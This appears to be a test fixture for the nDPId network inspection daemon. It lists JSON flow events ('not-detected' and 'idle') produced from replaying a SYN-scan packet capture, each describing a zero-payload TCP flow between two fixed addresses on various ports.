+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4446,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4445,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1090,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4446,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2399,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2399,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2401,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4449,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2401,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4449,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4449,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1745,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6510,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":987,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10616,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1060,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10617,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059627,"flow_last_seen":1278275059627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10617,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 